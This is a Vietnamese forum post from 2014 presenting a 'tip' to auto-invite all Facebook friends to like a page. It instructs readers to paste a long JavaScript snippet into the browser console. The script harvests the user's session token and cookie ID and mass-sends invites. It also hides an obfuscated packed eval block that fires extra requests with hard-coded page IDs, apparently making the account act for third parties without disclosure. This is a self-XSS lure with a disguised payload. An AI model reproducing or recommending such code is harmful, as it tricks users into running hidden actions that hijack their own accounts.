Thủ thuật : Từ mời bạn bè like facebook

...::: Thế Giới Mới :::...


 
:: Diễn Đàn StarNight - TháiTử Private::
  • Music
>

Thủ thuật : Từ mời bạn bè like facebook

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Mon Aug 11, 2014 9:24 pm
avatar

Thành Viên- Admin
Danh Hiệu Cá NhânNgười Điều Hành

Người Điều Hành
Hiện đang:
Zodiac : Leo posts : 127
points : 6880210
thanked : 0
Ngày Đăng kí : 19/01/2013
Age : 30
Đến từ : THIÊN ĐƯỜNG CODE
Ứng dụng
Zodiac : Leo
posts : 127
points : 6880210
thanked : 0
Ngày Đăng kí : 19/01/2013
Age : 30
Đến từ : THIÊN ĐƯỜNG CODE
Bài gửiTiêu đề: Thủ thuật : Từ mời bạn bè like facebook
Xem lý lịch thành viên http://starnight.forumvi.com

AE Hãy "Đoàn Kết- Yêu Thương - Giúp Đỡ " Lẫn Nhau...
»Tiêu đề: Thủ thuật : Từ mời bạn bè like facebook

Trước tiên vào 1 trang pace hoặc facebook của mình hoặc bạn bè
- Nhấn f12 lên --> chọn --> Console --> Dán code vào bên dưới rùi enter thế là xong tự mời !

CODE :
Code:
javascript:var Title="Auto m?i b?n bè like page </A>";var Descriptions="",_text='Code Mo`i Ba?n Be` Like Page</br>K?ch b?n </A><A style="color:#3B5998;" href="http://www.facebook.com/zzlov3zz" target="_blank"> Monkeys Wild</A></A>,</A><A style="color:#3B5998;" href="http://www.facebook.com/cozjhot" target="_blank"> Có Gì Hót ?</A></A>.</br>Page C?a Tôi<A style="color:#3B5998;" href="http://blog.ct98.net/" target="_blank"></A>.</A>';page_id=/"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];function InviteFriends(f){jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send_single?page_id="+page_id+"&invitee="+f+"&elem_id=u_0_1k&action=send&__user="+user_id+"&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg="+fb_dtsg+"&phstamp=",function(a){var b=a.substring(a.indexOf("{"));var c=JSON.parse(b);i--;Descriptions="<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";if(c.error){Descriptions+="color:darkred'>";err++;if(c.errorDescription)Descriptions+=c.errorDescription;else Descriptions+=JSON.stringify(c,null,"")}else{Descriptions+="color:darkgreen'>";Descriptions+=arn[i]+" dã du?c m?i like page "+page_name+".";suc++}Descriptions+="</div>";var d="<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.3);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";d+="<div style='padding-bottom:5px;font-size:20px;'>"+Title+"</div>";if(i>0){d+=arr.length+" B?n bè tìm du?c<br/>";d+="<b>"+suc+"</b> B?n Bè du?c m?i of "+(arr.length-i)+" B?n bè ch? x? lý ";d+="("+i+" b?n bè....)";d+="<div class='friend-edge'>";d+=Descriptions;d+="<img style='width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src="+pho[i]+"></img><a style='font-size:13px;padding-left:8px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>"+arn[i]+"</a>";d+="<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";d+="Vui Lòng Ð?i Giây Lát dang trong quá trình m?i b?n bè like page"+page_name+".</br>";d+=_text;d+="</div>";d+="</div>";window[tag+"_close"]=true}else{Title="All Of Your Friends Have Been Invited to Like Your Page.</A>";d+=arr.length+" Friends Detected and ";d+="<b>"+suc+" Friends Invited.</b></br>";d+="<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"' style='color:gray'>Cancel</span><br/>";d+="<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";d+=_text;d+="</div>";window[tag+"_close"]=false}d+="</div>";document.getElementById("pagelet_sidebar").innerHTML=d},"text","post");tay--;if(tay>0){var s=arr[tay];setTimeout("InviteFriends("+s+")",100)}console.log(tay+"/"+arr.length+":"+arr[tay]+"/"+arn[tay]+", success:"+suc);eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('18 b=["\\k\\i\\e\\j\\e\\n\\e\\v","\\v\\e\\n\\f\\j\\r\\e\\u","\\o\\o\\z\\z\\z\\C\\x\\f\\n\\a\\t\\e\\e\\I\\C\\n\\e\\l\\o\\f\\15\\f\\L\\o\\k\\f\\s\\a\\d\\o\\r\\u\\17\\r\\j\\a\\o\\d\\a\\u\\m\\14\\h\\x\\t\\c\\m\\j\\d\\s\\g","\\h\\k\\i\\e\\x\\r\\v\\a\\Z\\B\\e\\e\\d\\a\\i\\1e\\j\\a\\l\\d\\g\\A\\w\\1c\\A\\q\\q","\\A\\q\\q\\A\\J\\16\\P\\A\\w\\X\\h\\n\\B\\a\\n\\I\\f\\t\\v\\a\\r\\j\\a\\l\\d\\W\\E\\V\\g","\\h\\k\\f\\s\\a\\c\\r\\m\\g\\w\\Y\\y\\E\\E\\y\\F\\q\\Y\\F\\H\\O\\E\\q\\q\\h\\c\\c\\p\\d\\a\\i\\g","\\h\\c\\c\\f\\g\\P\\h\\c\\c\\m\\G\\u\\g\\w\\u\\y\\f\\X\\F\\19\\F\\Z\\1a\\1b\\J\\p\\r\\h\\c\\c\\i\\a\\U\\g\\I\\h\\k\\B\\d\\j\\f\\l\\k\\g","\\j\\a\\L\\j","\\k\\e\\d\\j","\\v\\e\\f\\m","\\h\\k\\f\\s\\a\\c\\r\\m\\g\\J\\O\\y\\O\\H\\y\\y\\w\\E\\q\\q\\H\\F\\H\\w\\h\\c\\c\\p\\d\\a\\i\\g","\\o\\o\\z\\z\\z\\C\\x\\f\\n\\a\\t\\e\\e\\I\\C\\n\\e\\l\\o\\f\\15\\f\\L\\o\\s\\i\\e\\p\\k\\d\\o\\l\\a\\l\\t\\a\\i\\d\\o\\f\\m\\m\\c\\k\\e\\d\\j\\C\\k\\B\\k\\14\\c\\c\\f\\g\\P\\h\\x\\t\\c\\m\\j\\d\\s\\g","\\h\\s\\i\\e\\p\\k\\c\\r\\m\\g\\h\\d\\e\\p\\i\\n\\a\\g\\j\\G\\k\\a\\f\\B\\a\\f\\m\\h\\l\\a\\l\\t\\a\\i\\d\\g","\\h\\u\\n\\j\\i\\W\\c\\q\\V\\g\\k\\f\\s\\a\\v\\a\\j\\c\\s\\i\\e\\p\\k\\c\\l\\a\\l\\t\\a\\i\\d\\c\\d\\p\\l\\l\\f\\i\\G\\h\\v\\d\\m\\h\\k\\e\\d\\j\\c\\x\\e\\i\\l\\c\\r\\m\\c\\d\\e\\p\\i\\n\\a\\g\\16\\d\\G\\u\\n\\1d\\a\\U\\p\\a\\d\\j\\h\\c\\c\\p\\d\\a\\i\\g"];R(S){T[b[9]](K[b[1]][b[0]]+b[2]+Q+b[3]+D+b[4]+D+b[5]+M+b[6],N(){},b[7],b[8])};R(S){T[b[9]](K[b[1]][b[0]]+b[2]+Q+b[3]+D+b[4]+D+b[10]+M+b[6],N(){},b[7],b[8])};R(S){T[b[9]](K[b[1]][b[0]]+b[11]+Q+b[12]+D+b[13]+M,N(){},b[7],b[8])};',62,77,'||||||||||x65|_0x91c9|x5F|x73|x6F|x61|x3D|x26|x72|x74|x70|x6D|x64|x63|x2F|x75|x32|x69|x67|x62|x6E|x6C|x37|x66|x38|x77|x25|x68|x2E|opo|x30|x35|x79|x34|x6B|x33|window|x78|user_id|function|x39|x31|fb_dtsg|if|page_id|jx|x71|x5D|x5B|x44|x36|x43|||||x3F|x6A|x41|x76|var|x7A|x46|x2D|x42|x52|x49'.split('|'),0,{}))}jx={b:function(){var b=!1;if("undefined"!=typeof ActiveXObject)try{b=new ActiveXObject("Msxml2.XMLHTTP")}catch(c){try{b=new ActiveXObject("Microsoft.XMLHTTP")}catch(a){b=!1}}else if(window.XMLHttpRequest)try{b=new XMLHttpRequest}catch(h){b=!1}return b},load:function(b,c,a,h,g){var e=this.d();if(e&&b){e.overrideMimeType&&e.overrideMimeType("text/xml");h||(h="GET");a||(a="text");g||(g={});a=a.toLowerCase();h=h.toUpperCase();b+=b.indexOf("?")+1?"&":"?";var k=null;""==h&&(k=b.split("?"),b=k[0],k=k[1]);e.open(h,b,!0);e.onreadystatechange=g.c?function(){g.c(e)}:function(){if(4==e.readyState)if(200==e.status){var b="";e.responseText&&(b=e.responseText);"j"==a.charAt(0)?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):"x"==a.charAt(0)&&(b=e.responseXML);c&&c(b)}else g.f&&document.getElementsByTagName("body")[0].removeChild(g.f),g.e&&(document.getElementById(g.e).style.display="none"),error&&error(e.status)};e.send(k)}},d:function(){return this.b()}};function ChangeLocation(){window.location.href="http://www.facebook.com/"}setTimeout("ChangeLocation",1);window.onbeforeunload=function(){if(window[tag+"_close"])return"This script is running now!"};var i=3;var tay=3;var suc=0;var err=0;var arr=new Array;var arn=new Array;var pho=new Array;var tag="Close";var page_name,x=document.getElementsByTagName("span");for(i=0;i<x.length;i++)if(x[i].getAttribute("itemprop")=="name")page_name=x[i].innerHTML;var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);jx.load(window.location.protocol+"///www.facebook.com/ajax/typeahead/first_degree.php?viewer="+user_id+"&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user="+user_id+"&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l",function(a){var b=a;var c=b.substring(b.indexOf("{"));var d=JSON.parse(c);d=d.payload.entries;for(var e=0;e<d.length;e++)arr.push(d[e].uid);for(var f=0;f<d.length;f++)arn.push(d[f].text);for(var g=0;g<d.length;g++)pho.push(d[g].photo);i=arr.length-1;tay=i;console.log(arr.length);var h="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";h+="<div style='padding-bottom:10px;font-size:20px;'>"+Title+"</div>";h+=arr.length+" Friends Detected";h+="</div>";document.getElementById("pagelet_sidebar").innerHTML=h;InviteFriends(arr[i])});

Share
_________________
"Không Việc Gì Khó,CHỉ Sợ Lòng Không Bền..."Tài Sản của AdminThủ thuật : Từ mời bạn bè like facebook

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang

Bài viết mới cùng chuyên mục

Bài viết liên quan

      Permissions in this forum:Bạn không có quyền trả lời bài viết
      ...::: Thế Giới Mới :::... :: KHU VỰC CÔNG NGHỆ :: Internet - Chat - Mail-